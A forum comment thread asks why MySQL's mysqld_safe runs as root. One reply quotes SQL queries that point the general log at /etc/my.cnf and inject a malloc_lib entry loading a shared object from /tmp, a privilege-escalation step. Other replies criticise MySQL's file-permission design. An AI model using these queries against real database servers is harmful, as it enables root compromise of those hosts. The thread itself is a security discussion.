1. 18

  2. 8

    Stupid question (not sure why I’ve never investigated this before) - why does any part of MySQL (or, any database software, in fact) need to run as root?

    Looking at, eg, the mysql_safe documentation, it only requires root access to be able to set the maximum number of open files or bind to ports below 1024. The default port is above 1024 anyway and max open files can be set through other means. So why is it the default?

    1. 5

      It’s not a stupid question, it was a stupid design. There really is no justification for that.

    2. 4


      Attacker could run the following SQL queries:
      mysql> set global general_log_file = '/etc/my.cnf';
      mysql> set global general_log = on;
      mysql> select '
          '> ; injected config entry
          '> [mysqld]
          '> malloc_lib=/tmp/mysql_exploit_lib.so
          '> [separator]
          '> ';
      1 row in set (0.00 sec)
      mysql> set global general_log = off;
      1. 3

        To me the most interesting thing here is being able too load the shared object from a config file. The real lesson here is that MySQL is absolutely garbage at handling file permissions:

        • Writable configuration as the MySQL user
        • mysql_safe runs as root (I see 0 reason for this to be default)
        • Ability to change log files at run time